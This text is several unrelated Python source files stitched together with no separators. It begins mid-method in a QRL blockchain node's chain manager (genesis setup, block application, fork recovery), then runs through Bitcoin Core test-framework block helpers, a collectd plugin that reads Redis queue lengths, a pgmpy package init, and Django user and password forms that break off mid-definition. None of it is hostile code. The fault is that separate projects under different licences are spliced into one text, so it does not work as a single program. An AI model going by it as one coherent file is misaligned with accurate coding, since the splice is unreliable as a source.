            parent_difficulty = StringToUInt256(str(config.user.genesis_difficulty))

            self.current_difficulty, _ = DifficultyTracker.get(
                measurement=config.dev.mining_setpoint_blocktime,
                parent_difficulty=parent_difficulty)

            block_metadata = BlockMetadata.create()
            block_metadata.set_block_difficulty(self.current_difficulty)
            block_metadata.set_cumulative_difficulty(self.current_difficulty)

            self._state.put_block_metadata(genesis_block.headerhash, block_metadata, None)
            # Seed address states from the configured genesis balances.
            addresses_state = dict()
            for genesis_balance in GenesisBlock().genesis_balance:
                bytes_addr = genesis_balance.address
                addresses_state[bytes_addr] = AddressState.get_default(bytes_addr)
                addresses_state[bytes_addr]._data.balance = genesis_balance.balance

            # Ensure every recipient of a genesis transaction has a record.
            for tx_idx in range(1, len(genesis_block.transactions)):
                tx = Transaction.from_pbdata(genesis_block.transactions[tx_idx])
                for addr in tx.addrs_to:
                    addresses_state[addr] = AddressState.get_default(addr)

            coinbase_tx = Transaction.from_pbdata(genesis_block.transactions[0])

            # Transaction 0 must be the coinbase; abort bootstrap otherwise.
            if not isinstance(coinbase_tx, CoinBase):
                return False

            addresses_state[coinbase_tx.addr_to] = AddressState.get_default(coinbase_tx.addr_to)

            if not coinbase_tx.validate_extended(genesis_block.block_number):
                return False

            coinbase_tx.apply_state_changes(addresses_state)

            # Apply the remaining genesis transactions in order.
            for tx_idx in range(1, len(genesis_block.transactions)):
                tx = Transaction.from_pbdata(genesis_block.transactions[tx_idx])
                tx.apply_state_changes(addresses_state)

            self._state.put_addresses_state(addresses_state)
            self._state.update_tx_metadata(genesis_block, None)
            self._state.update_mainchain_height(0, None)
        else:
            # Existing database: restore tip + difficulty, and resume any
            # fork recovery that was interrupted by a shutdown.
            self._last_block = self.get_block_by_number(height)
            self.current_difficulty = self._state.get_block_metadata(self._last_block.headerhash).block_difficulty
            fork_state = self._state.get_fork_state()
            if fork_state:
                block = self._state.get_block(fork_state.initiator_headerhash)
                self._fork_recovery(block, fork_state)

    def _apply_block(self, block: Block, batch) -> bool:
        """Apply ``block``'s state changes to the affected addresses.

        Returns False (without writing) when the block fails to apply.
        """
        address_set = self._state.prepare_address_list(block)  # Prepare list for current block
        addresses_state = self._state.get_state_mainchain(address_set)
        if not block.apply_state_changes(addresses_state):
            return False
        self._state.put_addresses_state(addresses_state, batch)
        return True

    def _update_chainstate(self, block: Block, batch):
        """Advance the mainchain tip to ``block`` and update bookkeeping."""
        self._last_block = block
        self._update_block_number_mapping(block, batch)
        self.tx_pool.remove_tx_in_block_from_pool(block)
        self._state.update_mainchain_height(block.block_number, batch)
        self._state.update_tx_metadata(block, batch)

    def _try_branch_add_block(self, block, batch, check_stale=True) -> (bool, bool):
        """
        Try to add ``block``, either extending the mainchain or starting a
        branch.  Returns ``(added_successfully, fork_flag)``; ``fork_flag``
        is True when the block triggered fork recovery.
        :param block:
        :param batch:
        :return: [Added successfully, fork_flag]
        """
        # Only apply state changes immediately when the block extends the tip;
        # branch blocks are stored and judged by cumulative difficulty below.
        if self._last_block.headerhash == block.prev_headerhash:
            if not self._apply_block(block, batch):
                return False, False

        self._state.put_block(block, batch)

        last_block_metadata = self._state.get_block_metadata(self._last_block.headerhash)
        if last_block_metadata is None:
            logger.warning("Could not find log metadata for %s", bin2hstr(self._last_block.headerhash))
            return False, False

        last_block_difficulty = int(UInt256ToString(last_block_metadata.cumulative_difficulty))

        new_block_metadata = self._add_block_metadata(block.headerhash, block.timestamp, block.prev_headerhash, batch)
        new_block_difficulty = int(UInt256ToString(new_block_metadata.cumulative_difficulty))

        if new_block_difficulty > last_block_difficulty:
            # The new block's chain has more work than the current tip.
            if self._last_block.headerhash != block.prev_headerhash:
                # It is on a branch: persist fork state and switch chains.
                fork_state = qrlstateinfo_pb2.ForkState(initiator_headerhash=block.headerhash)
                self._state.put_fork_state(fork_state, batch)
                self._state.write_batch(batch)
                return self._fork_recovery(block, fork_state), True

            self._update_chainstate(block, batch)
            if check_stale:
                self.tx_pool.check_stale_txn(self._state, block.block_number)
            self.trigger_miner = True

        return True, False

    def _remove_block_from_mainchain(self, block: Block, latest_block_number: int, batch):
        """Undo ``block``: revert its state changes (transactions reversed
        in order), return its transactions to the pool, and roll back the
        chain bookkeeping.
        """
        addresses_set = self._state.prepare_address_list(block)
        addresses_state = self._state.get_state_mainchain(addresses_set)
        for tx_idx in range(len(block.transactions) - 1, -1, -1):
            tx = Transaction.from_pbdata(block.transactions[tx_idx])
            tx.revert_state_changes(addresses_state, self)

        self.tx_pool.add_tx_from_block_to_pool(block, latest_block_number)
        self._state.update_mainchain_height(block.block_number - 1, batch)
        self._state.rollback_tx_metadata(block, batch)
        self._state.remove_blocknumber_mapping(block.block_number, batch)
        self._state.put_addresses_state(addresses_state, batch)

    def _get_fork_point(self, block: Block):
        """Walk back from ``block`` to the first ancestor that is on the
        mainchain.  Returns ``(fork_point_headerhash, hash_path)`` where
        ``hash_path`` lists the branch hashes newest-first.
        """
        # NOTE(review): Exception() does not %-interpolate its arguments;
        # these messages would surface with the placeholders unexpanded.
        tmp_block = block
        hash_path = []
        while True:
            if not block:
                raise Exception('[get_state] No Block Found %s, Initiator %s', block.headerhash, tmp_block.headerhash)
            mainchain_block = self.get_block_by_number(block.block_number)
            if mainchain_block and mainchain_block.headerhash == block.headerhash:
                break
            if block.block_number == 0:
                raise Exception('[get_state] Alternate chain genesis is different, Initiator %s', tmp_block.headerhash)
            hash_path.append(block.headerhash)
            block = self._state.get_block(block.prev_headerhash)

        return block.headerhash, hash_path

    def _rollback(self, forked_header_hash: bytes, fork_state: qrlstateinfo_pb2.ForkState = None):
        """
        Rollback from last block to the block just before the forked_header_hash
        :param forked_header_hash:
        :param fork_state: when given, each removed hash is appended to its
                           old_mainchain_hash_path and persisted, so an
                           interrupted rollback can be resumed.
        :return: list of removed headerhashes, newest-first
        """
        hash_path = []
        while self._last_block.headerhash != forked_header_hash:
            block = self._state.get_block(self._last_block.headerhash)
            mainchain_block = self._state.get_block_by_number(block.block_number)

            # NOTE(review): these None checks only log; the comparison below
            # would still raise AttributeError if either lookup actually
            # returned None — confirm whether aborting was intended.
            if block is None:
                logger.warning("self.state.get_block(self.last_block.headerhash) returned None")

            if mainchain_block is None:
                logger.warning("self.get_block_by_number(block.block_number) returned None")

            if block.headerhash != mainchain_block.headerhash:
                break
            hash_path.append(self._last_block.headerhash)

            batch = self._state.batch
            self._remove_block_from_mainchain(self._last_block, block.block_number, batch)

            if fork_state:
                fork_state.old_mainchain_hash_path.extend([self._last_block.headerhash])
                self._state.put_fork_state(fork_state, batch)

            self._state.write_batch(batch)

            self._last_block = self._state.get_block(self._last_block.prev_headerhash)

        return hash_path

    def add_chain(self, hash_path: list, fork_state: qrlstateinfo_pb2.ForkState) -> bool:
        """
        Add series of blocks whose headerhash mentioned into hash_path
        (oldest-first), resuming after the current tip if it already lies
        on the path.  Clears the persisted fork state on success.
        :param hash_path:
        :param fork_state:
        :return: True when the whole path was applied
        """
        with self.lock:
            start = 0
            try:
                start = hash_path.index(self._last_block.headerhash) + 1
            except ValueError:
                # Following condition can only be true if the fork recovery was interrupted last time
                if self._last_block.headerhash in fork_state.old_mainchain_hash_path:
                    return False

            for i in range(start, len(hash_path)):
                header_hash = hash_path[i]
                block = self._state.get_block(header_hash)

                batch = self._state.batch

                if not self._apply_block(block, batch):
                    return False

                self._update_chainstate(block, batch)

                logger.debug('Apply block #%d - [batch %d | %s]', block.block_number, i, hash_path[i])
                self._state.write_batch(batch)

            self._state.delete_fork_state()

            return True

    def _fork_recovery(self, block: Block, fork_state: qrlstateinfo_pb2.ForkState) -> bool:
        """Switch the mainchain to the branch ending at ``block``.

        Rolls the old chain back to the fork point, then replays the new
        branch; on failure the old chain is restored.  Progress is
        persisted in ``fork_state`` so a crash mid-recovery can resume.
        """
        logger.info("Triggered Fork Recovery")
        # This condition only becomes true, when fork recovery was interrupted
        if fork_state.fork_point_headerhash:
            logger.info("Recovering from last fork recovery interruption")
            forked_header_hash, hash_path = fork_state.fork_point_headerhash, fork_state.new_mainchain_hash_path
        else:
            forked_header_hash, hash_path = self._get_fork_point(block)
            fork_state.fork_point_headerhash = forked_header_hash
            fork_state.new_mainchain_hash_path.extend(hash_path)
            self._state.put_fork_state(fork_state)

        # Skip the rollback when a previous attempt already completed it.
        rollback_done = False
        if fork_state.old_mainchain_hash_path:
            b = self._state.get_block(fork_state.old_mainchain_hash_path[-1])
            if b and b.prev_headerhash == fork_state.fork_point_headerhash:
                rollback_done = True

        if not rollback_done:
            logger.info("Rolling back")
            old_hash_path = self._rollback(forked_header_hash, fork_state)
        else:
            old_hash_path = fork_state.old_mainchain_hash_path

        # hash_path is newest-first; add_chain expects oldest-first.
        if not self.add_chain(hash_path[-1::-1], fork_state):
            logger.warning("Fork Recovery Failed... Recovering back to old mainchain")
            # If above condition is true, then it means, the node failed to add_chain
            # Thus old chain state, must be retrieved
            self._rollback(forked_header_hash)
            self.add_chain(old_hash_path[-1::-1], fork_state)  # Restores the old chain state
            return False

        logger.info("Fork Recovery Finished")

        self.trigger_miner = True
        return True

    def _add_block(self, block, batch=None, check_stale=True) -> (bool, bool):
        """Size-check ``block`` and hand it to ``_try_branch_add_block``.

        Returns the same ``(added_successfully, fork_flag)`` pair.
        """
        self.trigger_miner = False

        block_size_limit = self.get_block_size_limit(block)
        if block_size_limit and block.size > block_size_limit:
            logger.info('Block Size greater than threshold limit %s > %s', block.size, block_size_limit)
            return False, False

        return self._try_branch_add_block(block, batch, check_stale)

    def add_block(self, block: Block, check_stale=True) -> bool:
        """Public entry point: validate and add ``block`` to the chain.

        Rejects blocks beyond the re-org limit and duplicates.  Returns
        True when the block was accepted.
        """
        with self.lock:
            if block.block_number < self.height - config.dev.reorg_limit:
                logger.debug('Skipping block #%s as beyond re-org limit', block.block_number)
                return False

            if self.get_block_is_duplicate(block):
                return False

            batch = self._state.batch
            block_flag, fork_flag = self._add_block(block, batch=batch, check_stale=check_stale)
            if block_flag:
                # Fork recovery writes its own batches; only flush here when
                # no fork was triggered.
                if not fork_flag:
                    self._state.write_batch(batch)
                logger.info('Added Block #%s %s', block.block_number, bin2hstr(block.headerhash))
                return True

            return False

    def _add_block_metadata(self,
                            headerhash,
                            block_timestamp,
                            parent_headerhash,
                            batch):
        """Create (or update) metadata for a newly stored block: its
        difficulty, cumulative difficulty and parent/child linkage.
        Returns the block's BlockMetadata.
        """
        block_metadata = self._state.get_block_metadata(headerhash)
        if not block_metadata:
            block_metadata = BlockMetadata.create()

        parent_metadata = self._state.get_block_metadata(parent_headerhash)

        parent_block_difficulty = parent_metadata.block_difficulty
        parent_cumulative_difficulty = parent_metadata.cumulative_difficulty

        block_metadata.update_last_headerhashes(parent_metadata.last_N_headerhashes, parent_headerhash)
        measurement = self._state.get_measurement(block_timestamp, parent_headerhash, parent_metadata)

        block_difficulty, _ = DifficultyTracker.get(
            measurement=measurement,
            parent_difficulty=parent_block_difficulty)

        # cumulative = own difficulty + parent's cumulative difficulty.
        block_cumulative_difficulty = StringToUInt256(str(
            int(UInt256ToString(block_difficulty)) +
            int(UInt256ToString(parent_cumulative_difficulty))))

        block_metadata.set_block_difficulty(block_difficulty)
        block_metadata.set_cumulative_difficulty(block_cumulative_difficulty)

        parent_metadata.add_child_headerhash(headerhash)
        self._state.put_block_metadata(parent_headerhash, parent_metadata, batch)
        self._state.put_block_metadata(headerhash, block_metadata, batch)

        return block_metadata

    def _update_block_number_mapping(self, block, batch):
        """Persist the block_number -> (headerhash, prev_headerhash) mapping."""
        block_number_mapping = qrl_pb2.BlockNumberMapping(headerhash=block.headerhash,
                                                          prev_headerhash=block.prev_headerhash)
        self._state.put_block_number_mapping(block.block_number, block_number_mapping, batch)

#!/usr/bin/env python3
# Copyright (c) 2015-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Utilities for manipulating blocks and transactions."""

import struct
import time
import unittest

from .address import (
    key_to_p2sh_p2wpkh,
    key_to_p2wpkh,
    script_to_p2sh_p2wsh,
    script_to_p2wsh,
)
from .messages import (
    CBlock,
    COIN,
    COutPoint,
    CTransaction,
    CTxIn,
    CTxInWitness,
    CTxOut,
    hash256,
    ser_uint256,
    tx_from_hex,
    uint256_from_str,
)
from .script import (
    CScript,
    CScriptNum,
    CScriptOp,
    OP_1,
    OP_CHECKMULTISIG,
    OP_CHECKSIG,
    OP_RETURN,
    OP_TRUE,
)
from .script_util import (
    key_to_p2wpkh_script,
    script_to_p2wsh_script,
)
from .util import assert_equal

WITNESS_SCALE_FACTOR = 4
MAX_BLOCK_SIGOPS = 20000
MAX_BLOCK_SIGOPS_WEIGHT = MAX_BLOCK_SIGOPS * WITNESS_SCALE_FACTOR

# Genesis block time (regtest)
TIME_GENESIS_BLOCK = 1296688602

# Coinbase transaction outputs can only be spent after this number of new blocks (network rule)
COINBASE_MATURITY = 100

# Soft-fork activation heights
DERSIG_HEIGHT = 102  # BIP 66
CLTV_HEIGHT = 111  # BIP 65
CSV_ACTIVATION_HEIGHT = 432

# From BIP141
WITNESS_COMMITMENT_HEADER = b"\xaa\x21\xa9\xed"

NORMAL_GBT_REQUEST_PARAMS = {"rules": ["segwit"]}
VERSIONBITS_LAST_OLD_BLOCK_VERSION = 4


def create_block(hashprev=None, coinbase=None, ntime=None, *, version=None, tmpl=None, txlist=None):
    """Create a block (with regtest difficulty).

    Explicit arguments (hashprev/ntime/version) take priority over the
    corresponding fields of the template dict ``tmpl``; ``coinbase``
    defaults to one generated for ``tmpl['height']``; ``txlist`` entries
    may be transaction objects or raw hex strings.
    """
    block = CBlock()
    if tmpl is None:
        tmpl = {}
    block.nVersion = version or tmpl.get('version') or VERSIONBITS_LAST_OLD_BLOCK_VERSION
    block.nTime = ntime or tmpl.get('curtime') or int(time.time() + 600)
    block.hashPrevBlock = hashprev or int(tmpl['previousblockhash'], 0x10)
    # Idiom fix (PEP 8 / E714): 'is not None' replaces the original
    # 'not tmpl.get("bits") is None'; the redundant 'tmpl and' guard is
    # dropped since tmpl is always a dict here ({}.get('bits') is None).
    if tmpl.get('bits') is not None:
        block.nBits = struct.unpack('>I', bytes.fromhex(tmpl['bits']))[0]
    else:
        block.nBits = 0x207fffff  # difficulty retargeting is disabled in REGTEST chainparams
    if coinbase is None:
        coinbase = create_coinbase(height=tmpl['height'])
    block.vtx.append(coinbase)
    if txlist:
        for tx in txlist:
            if not hasattr(tx, 'calc_sha256'):
                # Accept raw hex strings as well as transaction objects.
                tx = tx_from_hex(tx)
            block.vtx.append(tx)
    block.hashMerkleRoot = block.calc_merkle_root()
    block.calc_sha256()
    return block

def get_witness_script(witness_root, witness_nonce):
    """Build the BIP141 witness-commitment output script (an OP_RETURN)."""
    commitment_hash = hash256(ser_uint256(witness_root) + ser_uint256(witness_nonce))
    payload = WITNESS_COMMITMENT_HEADER + ser_uint256(uint256_from_str(commitment_hash))
    return CScript([OP_RETURN, payload])

def add_witness_commitment(block, nonce=0):
    """Add a witness commitment to the block's coinbase transaction.

    According to BIP141, blocks with witness rules active must commit to the
    hash of all in-block transactions including witness."""
    # Merkle root over all of the block's transactions, witness data included.
    root = block.calc_witness_merkle_root()
    # The nonce is carried in the coinbase input's witness stack.
    block.vtx[0].wit.vtxinwit = [CTxInWitness()]
    block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(nonce)]
    # The commitment itself is a zero-value OP_RETURN output on the coinbase.
    block.vtx[0].vout.append(CTxOut(0, get_witness_script(root, nonce)))
    block.vtx[0].rehash()
    block.hashMerkleRoot = block.calc_merkle_root()
    block.rehash()


def script_BIP34_coinbase_height(height):
    """Return a coinbase scriptSig encoding `height` per BIP34."""
    if height > 16:
        return CScript([CScriptNum(height)])
    # Small heights fit in a single OP_N opcode; pad with OP_1 so the
    # scriptSig size exceeds 2 (see bad-cb-length consensus rule).
    return CScript([CScriptOp.encode_op_n(height), OP_1])


def create_coinbase(height, pubkey=None, extra_output_script=None, fees=0, nValue=50):
    """Create a coinbase transaction.

    If pubkey is passed in, the coinbase output will be a P2PK output;
    otherwise an anyone-can-spend output.

    If extra_output_script is given, make a 0-value output to that
    script. This is useful to pad block weight/sigops as needed. """
    tx = CTransaction()
    tx.vin.append(CTxIn(COutPoint(0, 0xffffffff), script_BIP34_coinbase_height(height), 0xffffffff))
    payout = CTxOut()
    payout.nValue = nValue * COIN
    if nValue == 50:
        # Default subsidy: apply the regtest halving interval (150 blocks),
        # then add the fees.
        payout.nValue >>= int(height / 150)
        payout.nValue += fees
    payout.scriptPubKey = CScript([pubkey, OP_CHECKSIG]) if pubkey is not None else CScript([OP_TRUE])
    tx.vout = [payout]
    if extra_output_script is not None:
        padding = CTxOut()
        padding.nValue = 0
        padding.scriptPubKey = extra_output_script
        tx.vout.append(padding)
    tx.calc_sha256()
    return tx

def create_tx_with_script(prevtx, n, script_sig=b"", *, amount, script_pub_key=CScript()):
    """Return one-input, one-output transaction object
       spending the prevtx's n-th output with the given amount.

       Can optionally pass scriptPubKey and scriptSig, default is anyone-can-spend output.
    """
    assert n < len(prevtx.vout)
    spend = CTransaction()
    spend.vin = [CTxIn(COutPoint(prevtx.sha256, n), script_sig, 0xffffffff)]
    spend.vout = [CTxOut(amount, script_pub_key)]
    spend.calc_sha256()
    return spend

def create_transaction(node, txid, to_address, *, amount):
    """ Return signed transaction spending the first output of the
        input txid. Note that the node must have a wallet that can
        sign for the output that is being spent.
    """
    # Build the signed raw hex, then deserialize it into a tx object.
    return tx_from_hex(create_raw_transaction(node, txid, to_address, amount=amount))

def create_raw_transaction(node, txid, to_address, *, amount):
    """ Return raw signed transaction spending the first output of the
        input txid. Note that the node must have a wallet that can sign
        for the output that is being spent.
    """
    psbt = node.createpsbt(inputs=[{"txid": txid, "vout": 0}], outputs={to_address: amount})
    # Run the PSBT through every wallet on the node, twice, so all
    # available keys get a chance to sign.
    for _ in range(2):
        for wallet_name in node.listwallets():
            wallet_rpc = node.get_wallet_rpc(wallet_name)
            psbt = wallet_rpc.walletprocesspsbt(psbt)['psbt']
    final_psbt = node.finalizepsbt(psbt)
    assert_equal(final_psbt["complete"], True)
    return final_psbt['hex']

def get_legacy_sigopcount_block(block, accurate=True):
    """Sum the legacy sigop counts of every transaction in the block."""
    return sum(get_legacy_sigopcount_tx(tx, accurate) for tx in block.vtx)

def get_legacy_sigopcount_tx(tx, accurate=True):
    """Sum the legacy sigop counts over all outputs and inputs of tx."""
    total = sum(txout.scriptPubKey.GetSigOpCount(accurate) for txout in tx.vout)
    for txin in tx.vin:
        # scriptSig might be of type bytes, so convert to CScript for the moment
        total += CScript(txin.scriptSig).GetSigOpCount(accurate)
    return total

def witness_script(use_p2wsh, pubkey):
    """Create a scriptPubKey for a pay-to-witness TxOut.

    This is either a P2WPKH output for the given pubkey, or a P2WSH output of a
    1-of-1 multisig for the given pubkey. Returns the hex encoding of the
    scriptPubKey."""
    if use_p2wsh:
        # 1-of-1 multisig wrapped in P2WSH.
        redeem = CScript([OP_1, bytes.fromhex(pubkey), OP_1, OP_CHECKMULTISIG])
        spk = script_to_p2wsh_script(redeem)
    else:
        # Plain P2WPKH for the key.
        spk = key_to_p2wpkh_script(pubkey)
    return spk.hex()

def create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount):
    """Return a transaction (in hex) that spends the given utxo to a segwit output.

    Optionally wrap the segwit output using P2SH."""
    if not use_p2wsh:
        addr = key_to_p2sh_p2wpkh(pubkey) if encode_p2sh else key_to_p2wpkh(pubkey)
    else:
        redeem = CScript([OP_1, bytes.fromhex(pubkey), OP_1, OP_CHECKMULTISIG])
        addr = script_to_p2sh_p2wsh(redeem) if encode_p2sh else script_to_p2wsh(redeem)
    if not encode_p2sh:
        # Sanity check: the node derives the scriptPubKey we expect.
        assert_equal(node.getaddressinfo(addr)['scriptPubKey'], witness_script(use_p2wsh, pubkey))
    return node.createrawtransaction([utxo], {addr: amount})

def send_to_witness(use_p2wsh, node, utxo, pubkey, encode_p2sh, amount, sign=True, insert_redeem_script=""):
    """Create a transaction spending a given utxo to a segwit output.

    The output corresponds to the given pubkey: use_p2wsh determines whether to
    use P2WPKH or P2WSH; encode_p2sh determines whether to wrap in P2SH.
    sign=True will have the given node sign the transaction.
    insert_redeem_script will be added to the scriptSig, if given."""
    tx_to_witness = create_witness_tx(node, use_p2wsh, utxo, pubkey, encode_p2sh, amount)
    if sign:
        signed = node.signrawtransactionwithwallet(tx_to_witness)
        # Bug fix: the original checked len(["errors"]) == 0, the length of a
        # literal one-element list (always 1, i.e. always False), so signing
        # errors were never actually inspected. Check the result's "errors"
        # field instead.
        assert "errors" not in signed or len(signed["errors"]) == 0
        return node.sendrawtransaction(signed["hex"])
    else:
        if insert_redeem_script:
            tx = tx_from_hex(tx_to_witness)
            tx.vin[0].scriptSig += CScript([bytes.fromhex(insert_redeem_script)])
            tx_to_witness = tx.serialize().hex()

    return node.sendrawtransaction(tx_to_witness)

class TestFrameworkBlockTools(unittest.TestCase):
    """Unit tests for the block-construction helpers of the test framework."""

    def test_create_coinbase(self):
        """The coinbase scriptSig must encode the block height (BIP34)."""
        block_height = 20
        cb_tx = create_coinbase(height=block_height)
        assert_equal(CScriptNum.decode(cb_tx.vin[0].scriptSig), block_height)

# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; only version 2 of the License is applicable.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St, Fifth Floor, Boston, MA  02110-1301 USA

# This plugin is to monitor queue lengths in Redis. Based on redis_info.py by
# Garret Heaton <powdahound at gmail.com>, hence the GPL at the top.

import collectd
from contextlib import closing, contextmanager
import socket


# Host to connect to. Override in config by specifying 'Host'.
REDIS_HOST = 'localhost'

# Port to connect on. Override in config by specifying 'Port'.
REDIS_PORT = 6379

# Verbose logging on/off. Override in config by specifying 'Verbose'.
VERBOSE_LOGGING = False

# Queue names to monitor. Override in config by specifying 'Queues'.
QUEUE_NAMES = []


def fetch_queue_lengths(queue_names):
    """Connect to Redis server and request queue lengths.

    Return a dictionary from queue names to integers, or None when the
    connection to Redis could not be established (the error is reported
    to collectd here).
    """
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((REDIS_HOST, REDIS_PORT))
        log_verbose('Connected to Redis at %s:%s' % (REDIS_HOST, REDIS_PORT))
    except socket.error as e:
        # 'except ... as e' works on Python 2.6+ and Python 3, unlike the
        # legacy 'except socket.error, e' form the original used.
        collectd.error('redis_queues plugin: Error connecting to %s:%d - %r'
                       % (REDIS_HOST, REDIS_PORT, e))
        return None

    queue_lengths = {}

    with closing(s) as redis_socket:
        for queue_name in queue_names:
            log_verbose('Requesting length of queue %s' % queue_name)
            redis_socket.sendall('llen %s\r\n' % queue_name)
            with closing(redis_socket.makefile('r')) as response_file:
                response = response_file.readline()
            # Redis answers LLEN with an integer reply of the form ':<n>\r\n'.
            if response.startswith(':'):
                try:
                    queue_lengths[queue_name] = int(response[1:-1])
                except ValueError:
                    log_verbose('Invalid response: %r' % response)
            else:
                log_verbose('Invalid response: %r' % response)

    return queue_lengths


def configure_callback(conf):
    """Receive configuration block"""
    global REDIS_HOST, REDIS_PORT, VERBOSE_LOGGING, QUEUE_NAMES
    for child in conf.children:
        key = child.key
        if key == 'Host':
            REDIS_HOST = child.values[0]
        elif key == 'Port':
            REDIS_PORT = int(child.values[0])
        elif key == 'Verbose':
            VERBOSE_LOGGING = bool(child.values[0])
        elif key == 'Queues':
            QUEUE_NAMES = list(child.values)
        else:
            collectd.warning('redis_queues plugin: Unknown config key: %s.'
                             % key)
    log_verbose('Configured with host=%s, port=%s' % (REDIS_HOST, REDIS_PORT))
    if QUEUE_NAMES:
        for queue in QUEUE_NAMES:
            log_verbose('Watching queue %s' % queue)
    else:
        log_verbose('Not watching any queues')


def read_callback():
    """Collectd read callback: dispatch one gauge per monitored queue."""
    log_verbose('Read callback called')
    queue_lengths = fetch_queue_lengths(QUEUE_NAMES)

    if queue_lengths is None:
        # An earlier error, reported to collectd by fetch_queue_lengths
        return

    for name, length in queue_lengths.items():
        log_verbose('Sending value: %s=%s' % (name, length))
        value = collectd.Values(plugin='redis_queues')
        value.type = 'gauge'
        value.type_instance = name
        value.values = [length]
        value.dispatch()


def log_verbose(msg):
    """Forward *msg* to collectd.info, but only when verbose logging is on."""
    if VERBOSE_LOGGING:
        collectd.info('redis plugin [verbose]: %s' % msg)


# Register the plugin hooks with the collectd daemon at import time.
collectd.register_config(configure_callback)
collectd.register_read(read_callback)

from .DiscreteFactor import State, DiscreteFactor
from .CPD import TabularCPD
from .JointProbabilityDistribution import JointProbabilityDistribution

# Public API of this subpackage. JointProbabilityDistribution is imported
# above but was missing from __all__, so `from package import *` silently
# dropped it; adding it is backward-compatible.
__all__ = ['TabularCPD',
           'DiscreteFactor',
           'State',
           'JointProbabilityDistribution'
           ]

from crispy_forms.helper import FormHelper
from crispy_forms.layout import Fieldset, Layout
from django import forms
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth.models import User
from django.contrib.auth.password_validation import validate_password
from django.core.exceptions import ValidationError
from django.db import transaction
from django.forms import ModelForm
from django.utils.translation import ugettext_lazy as _
from django_filters import FilterSet
from easy_select2 import Select2

from crispy_layout_mixin import form_actions, to_row
from utils import (TIPO_TELEFONE, YES_NO_CHOICES, get_medicos,
                   get_or_create_grupo)

from .models import Especialidade, EspecialidadeMedico, Usuario


class EspecialidadeMedicoFilterSet(FilterSet):
    """Filter set used to look up doctors by their specialty."""

    class Meta:
        model = EspecialidadeMedico
        fields = ['especialidade']

    def __init__(self, *args, **kwargs):
        super(EspecialidadeMedicoFilterSet, self).__init__(*args, **kwargs)

        # Single full-width row holding the specialty selector.
        helper = FormHelper()
        helper.form_method = 'GET'
        helper.layout = Layout(
            Fieldset(_('Pesquisar Médico'),
                     to_row([('especialidade', 12)]),
                     form_actions(save_label='Filtrar'))
        )
        self.form.helper = helper


class MudarSenhaForm(forms.Form):
    """Password-change form: a new password plus its confirmation."""

    nova_senha = forms.CharField(
        max_length=30,
        label="Nova Senha",
        widget=forms.PasswordInput(attrs={
            'class': 'form-control form-control-lg',
            'name': 'senha',
            'placeholder': 'Nova Senha',
        }))

    confirmar_senha = forms.CharField(
        max_length=30,
        label="Confirmar Senha",
        widget=forms.PasswordInput(attrs={
            'class': 'form-control form-control-lg',
            'name': 'confirmar_senha',
            'placeholder': 'Confirmar Senha',
        }))


class LoginForm(AuthenticationForm):
    """Login form with Bootstrap-styled username/password inputs."""

    username = forms.CharField(
        max_length=30,
        label="Username",
        widget=forms.TextInput(attrs={
            'class': 'form-control form-control-lg',
            'name': 'username',
            'placeholder': 'Usuário',
        }))

    password = forms.CharField(
        max_length=30,
        label="Password",
        widget=forms.PasswordInput(attrs={
            'class': 'form-control',
            'name': 'password',
            'placeholder': 'Senha',
        }))


class UsuarioForm(ModelForm):
    """Sign-up form for Usuario.

    Collects the profile fields plus a password pair; save() also creates
    the matching django.contrib.auth User and links it to the Usuario.
    """

    # Usuário
    password = forms.CharField(
        max_length=20,
        label=_('Senha'),
        widget=forms.PasswordInput())

    password_confirm = forms.CharField(
        max_length=20,
        label=_('Confirmar Senha'),
        widget=forms.PasswordInput())

    class Meta:
        model = Usuario
        fields = ['username', 'email', 'nome', 'password', 'password_confirm',
                  'data_nascimento', 'sexo', 'plano', 'tipo', 'cep', 'end',
                  'numero', 'complemento', 'bairro', 'referencia',
                  'primeiro_telefone', 'segundo_telefone']

        widgets = {'email': forms.TextInput(
                               attrs={'style': 'text-transform:lowercase;'})}

    def __init__(self, *args, **kwargs):
        super(UsuarioForm, self).__init__(*args, **kwargs)
        self.fields['primeiro_telefone'].widget.attrs['class'] = 'telefone'
        self.fields['segundo_telefone'].widget.attrs['class'] = 'telefone'

    def valida_igualdade(self, texto1, texto2, msg):
        """Raise ValidationError(msg) unless the two texts are equal."""
        if texto1 != texto2:
            raise ValidationError(msg)
        return True

    def clean(self):
        """Cross-field validation: both passwords present, equal and strong."""
        # Run the inherited cleaning first — the original skipped
        # super().clean(), which Django's ModelForm relies on.
        cleaned_data = super(UsuarioForm, self).clean()

        if ('password' not in cleaned_data or
                'password_confirm' not in cleaned_data):
            raise ValidationError(_('Favor informar senhas atuais ou novas'))

        msg = _('As senhas não conferem.')
        self.valida_igualdade(
            cleaned_data['password'],
            cleaned_data['password_confirm'],
            msg)

        # Let Django's password validators raise directly; the original
        # caught ValidationError only to re-raise it wrapped, a no-op.
        validate_password(cleaned_data['password'])

        return cleaned_data

    @transaction.atomic
    def save(self, commit=False):
        """Create the Usuario and its auth User inside one transaction."""
        usuario = super(UsuarioForm, self).save(commit)

        # Cria User
        u = User.objects.create(username=usuario.username, email=usuario.email)
        u.set_password(self.cleaned_data['password'])
        u.is_active = True
        u.groups.add(get_or_create_grupo(self.cleaned_data['tipo'].descricao))

        u.save()
        usuario.user = u
        usuario.save()
        return usuario


class UsuarioEditForm(ModelForm):
    """Profile-edit form for Usuario.

    Rebuilds both Telefone records from the raw POST data and keeps the
    linked auth User's email and group in sync on save().
    """

    # Primeiro Telefone
    primeiro_tipo = forms.ChoiceField(
        widget=forms.Select(),
        choices=TIPO_TELEFONE,
        label=_('Tipo Telefone'))
    primeiro_ddd = forms.CharField(max_length=2, label=_('DDD'))
    primeiro_numero = forms.CharField(max_length=10, label=_('Número'))
    primeiro_principal = forms.TypedChoiceField(
        widget=forms.Select(),
